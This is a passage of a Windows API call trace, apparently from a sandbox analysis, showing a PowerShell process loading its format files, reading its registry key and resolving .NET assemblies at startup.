	[0445.492] ReadFile (in: hFile=0x2fc, lpBuffer=0x33c05c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x33c05c0*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.493] ReadFile (in: hFile=0x2fc, lpBuffer=0x33c05c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x33c05c0*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.493] ReadFile (in: hFile=0x2fc, lpBuffer=0x33c05c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x33c05c0*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.493] ReadFile (in: hFile=0x2fc, lpBuffer=0x33c05c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x33c05c0*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.493] ReadFile (in: hFile=0x2fc, lpBuffer=0x33c05c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x33c05c0*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.494] ReadFile (in: hFile=0x2fc, lpBuffer=0x33c05c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x33c05c0*, lpNumberOfBytesRead=0x12d2d8*=0x9e2, lpOverlapped=0x0) returned 1
	[0445.494] ReadFile (in: hFile=0x2fc, lpBuffer=0x33bfb0a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x33bfb0a*, lpNumberOfBytesRead=0x12d2d8*=0x0, lpOverlapped=0x0) returned 1
	[0445.494] ReadFile (in: hFile=0x2fc, lpBuffer=0x33c05c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x33c05c0*, lpNumberOfBytesRead=0x12d2d8*=0x0, lpOverlapped=0x0) returned 1
	[0445.494] CloseHandle (hObject=0x2fc) returned 1
	[0445.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0445.494] SetErrorMode (uMode=0x1) returned 0x1
	[0445.494] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d280 | out: lpFileInformation=0x12d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0445.494] SetErrorMode (uMode=0x1) returned 0x1
	[0445.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0445.495] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d368 | out: phkResult=0x12d368*=0x2fc) returned 0x0
	[0445.495] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2ec, lpData=0x0, lpcbData=0x12d2e8*=0x0 | out: lpType=0x12d2ec*=0x1, lpData=0x0, lpcbData=0x12d2e8*=0x56) returned 0x0
	[0445.495] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d18f0
	[0445.495] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2bc, lpData=0x1b7d18f0, lpcbData=0x12d2b8*=0x56 | out: lpType=0x12d2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d2b8*=0x56) returned 0x0
	[0445.495] CoTaskMemFree (pv=0x1b7d18f0) 
	[0445.495] RegCloseKey (hKey=0x2fc) returned 0x0
	[0445.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0445.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0445.503] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xac4b71ec, Data2=0x43ac, Data3=0x4926, Data4=([0]=0x89, [1]=0x8, [2]=0xcc, [3]=0x35, [4]=0xd, [5]=0x84, [6]=0x97, [7]=0xb8))) returned 0x0
	[0445.518] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xa7424541, Data2=0x92d3, Data3=0x4893, Data4=([0]=0x9d, [1]=0xc7, [2]=0x11, [3]=0x2e, [4]=0xe2, [5]=0x62, [6]=0x32, [7]=0xc7))) returned 0x0
	[0445.520] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0445.520] GetFileType (hFile=0x2fc) returned 0x1
	[0445.520] SetErrorMode (uMode=0x1) returned 0x1
	[0445.520] GetFileType (hFile=0x2fc) returned 0x1
	[0445.520] ReadFile (in: hFile=0x2fc, lpBuffer=0x33eb128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x33eb128*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.521] ReadFile (in: hFile=0x2fc, lpBuffer=0x33eb128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x33eb128*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.522] ReadFile (in: hFile=0x2fc, lpBuffer=0x33eb128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x33eb128*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.522] ReadFile (in: hFile=0x2fc, lpBuffer=0x33eb128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x33eb128*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.522] ReadFile (in: hFile=0x2fc, lpBuffer=0x33eb128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x33eb128*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.523] ReadFile (in: hFile=0x2fc, lpBuffer=0x33eb128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x33eb128*, lpNumberOfBytesRead=0x12d2d8*=0xfb2, lpOverlapped=0x0) returned 1
	[0445.523] ReadFile (in: hFile=0x2fc, lpBuffer=0x33ea842, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x33ea842*, lpNumberOfBytesRead=0x12d2d8*=0x0, lpOverlapped=0x0) returned 1
	[0445.523] ReadFile (in: hFile=0x2fc, lpBuffer=0x33eb128, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x33eb128*, lpNumberOfBytesRead=0x12d2d8*=0x0, lpOverlapped=0x0) returned 1
	[0445.568] CloseHandle (hObject=0x2fc) returned 1
	[0445.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0445.568] SetErrorMode (uMode=0x1) returned 0x1
	[0445.568] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d280 | out: lpFileInformation=0x12d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0445.568] SetErrorMode (uMode=0x1) returned 0x1
	[0445.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0445.569] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d368 | out: phkResult=0x12d368*=0x2fc) returned 0x0
	[0445.569] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2ec, lpData=0x0, lpcbData=0x12d2e8*=0x0 | out: lpType=0x12d2ec*=0x1, lpData=0x0, lpcbData=0x12d2e8*=0x56) returned 0x0
	[0445.569] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d18f0
	[0445.569] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2bc, lpData=0x1b7d18f0, lpcbData=0x12d2b8*=0x56 | out: lpType=0x12d2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d2b8*=0x56) returned 0x0
	[0445.569] CoTaskMemFree (pv=0x1b7d18f0) 
	[0445.569] RegCloseKey (hKey=0x2fc) returned 0x0
	[0445.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0445.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0445.571] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x42a521bc, Data2=0x40e, Data3=0x4b95, Data4=([0]=0x91, [1]=0xf9, [2]=0x8f, [3]=0x20, [4]=0xe9, [5]=0xde, [6]=0x9e, [7]=0xb9))) returned 0x0
	[0445.573] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xea9a8469, Data2=0x6ac5, Data3=0x483d, Data4=([0]=0xaf, [1]=0xf5, [2]=0x33, [3]=0x26, [4]=0x4f, [5]=0xa9, [6]=0x28, [7]=0x6e))) returned 0x0
	[0445.573] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xf04ed8b3, Data2=0x42d, Data3=0x40c2, Data4=([0]=0xb2, [1]=0xb1, [2]=0xf4, [3]=0xb4, [4]=0xe5, [5]=0x40, [6]=0x16, [7]=0x0))) returned 0x0
	[0445.574] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x917263d8, Data2=0xc5c8, Data3=0x40b3, Data4=([0]=0x97, [1]=0xc0, [2]=0xe2, [3]=0x44, [4]=0x6d, [5]=0xa, [6]=0x9d, [7]=0xd0))) returned 0x0
	[0445.574] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x36597714, Data2=0x6203, Data3=0x4b4f, Data4=([0]=0x82, [1]=0x18, [2]=0xf3, [3]=0x70, [4]=0x4, [5]=0xc4, [6]=0x2a, [7]=0x38))) returned 0x0
	[0445.574] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xea768bee, Data2=0x2912, Data3=0x431a, Data4=([0]=0x95, [1]=0x41, [2]=0x22, [3]=0xb8, [4]=0x37, [5]=0x26, [6]=0x1d, [7]=0x8))) returned 0x0
	[0445.574] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0445.574] GetFileType (hFile=0x2fc) returned 0x1
	[0445.574] SetErrorMode (uMode=0x1) returned 0x1
	[0445.574] GetFileType (hFile=0x2fc) returned 0x1
	[0445.574] ReadFile (in: hFile=0x2fc, lpBuffer=0x3436e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3436e88*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.576] ReadFile (in: hFile=0x2fc, lpBuffer=0x3436e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3436e88*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.576] ReadFile (in: hFile=0x2fc, lpBuffer=0x3436e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3436e88*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.576] ReadFile (in: hFile=0x2fc, lpBuffer=0x3436e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3436e88*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.577] ReadFile (in: hFile=0x2fc, lpBuffer=0x3436e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3436e88*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.577] ReadFile (in: hFile=0x2fc, lpBuffer=0x3436e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3436e88*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.577] ReadFile (in: hFile=0x2fc, lpBuffer=0x3436e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3436e88*, lpNumberOfBytesRead=0x12d2d8*=0xaca, lpOverlapped=0x0) returned 1
	[0445.578] ReadFile (in: hFile=0x2fc, lpBuffer=0x34364ba, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x34364ba*, lpNumberOfBytesRead=0x12d2d8*=0x0, lpOverlapped=0x0) returned 1
	[0445.578] ReadFile (in: hFile=0x2fc, lpBuffer=0x3436e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x3436e88*, lpNumberOfBytesRead=0x12d2d8*=0x0, lpOverlapped=0x0) returned 1
	[0445.578] CloseHandle (hObject=0x2fc) returned 1
	[0445.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0445.578] SetErrorMode (uMode=0x1) returned 0x1
	[0445.578] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d280 | out: lpFileInformation=0x12d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0445.578] SetErrorMode (uMode=0x1) returned 0x1
	[0445.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0445.579] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d368 | out: phkResult=0x12d368*=0x2fc) returned 0x0
	[0445.579] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2ec, lpData=0x0, lpcbData=0x12d2e8*=0x0 | out: lpType=0x12d2ec*=0x1, lpData=0x0, lpcbData=0x12d2e8*=0x56) returned 0x0
	[0445.579] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d18f0
	[0445.579] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2bc, lpData=0x1b7d18f0, lpcbData=0x12d2b8*=0x56 | out: lpType=0x12d2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d2b8*=0x56) returned 0x0
	[0445.579] CoTaskMemFree (pv=0x1b7d18f0) 
	[0445.579] RegCloseKey (hKey=0x2fc) returned 0x0
	[0445.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0445.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0445.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0445.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0445.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0445.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0445.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0445.693] VirtualQuery (in: lpAddress=0x12be00, lpBuffer=0x12ccc0, dwLength=0x30 | out: lpBuffer=0x12ccc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0445.694] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x5ffd0bc1, Data2=0xa976, Data3=0x4576, Data4=([0]=0x90, [1]=0xd9, [2]=0x84, [3]=0xa, [4]=0xea, [5]=0x9d, [6]=0xda, [7]=0xe3))) returned 0x0
	[0445.695] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xeccc694f, Data2=0xa35a, Data3=0x4968, Data4=([0]=0xb0, [1]=0xdb, [2]=0x4c, [3]=0xb9, [4]=0x18, [5]=0x29, [6]=0xb4, [7]=0x57))) returned 0x0
	[0445.696] VirtualQuery (in: lpAddress=0x12bfb0, lpBuffer=0x12ce70, dwLength=0x30 | out: lpBuffer=0x12ce70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0445.697] VirtualQuery (in: lpAddress=0x12bfb0, lpBuffer=0x12ce70, dwLength=0x30 | out: lpBuffer=0x12ce70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0445.698] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xdc33adf3, Data2=0xb830, Data3=0x4410, Data4=([0]=0xaf, [1]=0xaf, [2]=0x55, [3]=0xbc, [4]=0x82, [5]=0x34, [6]=0xe3, [7]=0x4d))) returned 0x0
	[0445.701] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xd0743a8a, Data2=0xb7c, Data3=0x4cc9, Data4=([0]=0x9e, [1]=0x27, [2]=0x2a, [3]=0xf7, [4]=0xf3, [5]=0xb8, [6]=0xb9, [7]=0xc2))) returned 0x0
	[0445.701] VirtualQuery (in: lpAddress=0x12c200, lpBuffer=0x12d0c0, dwLength=0x30 | out: lpBuffer=0x12d0c0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0445.702] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xebf87c66, Data2=0x66f4, Data3=0x4ee3, Data4=([0]=0xb3, [1]=0x7a, [2]=0x41, [3]=0x47, [4]=0x7e, [5]=0xf7, [6]=0xb6, [7]=0x7b))) returned 0x0
	[0445.703] VirtualQuery (in: lpAddress=0x12b870, lpBuffer=0x12c730, dwLength=0x30 | out: lpBuffer=0x12c730*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0445.703] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x4d565f67, Data2=0x58a8, Data3=0x4ef3, Data4=([0]=0x94, [1]=0x33, [2]=0xc, [3]=0xf, [4]=0x73, [5]=0x3a, [6]=0xbe, [7]=0x54))) returned 0x0
	[0445.703] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xf4ddd89a, Data2=0xe66d, Data3=0x42d4, Data4=([0]=0x9b, [1]=0xdc, [2]=0x89, [3]=0xc4, [4]=0x88, [5]=0xd, [6]=0x50, [7]=0x2))) returned 0x0
	[0445.703] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0445.703] GetFileType (hFile=0x2fc) returned 0x1
	[0445.703] SetErrorMode (uMode=0x1) returned 0x1
	[0445.704] GetFileType (hFile=0x2fc) returned 0x1
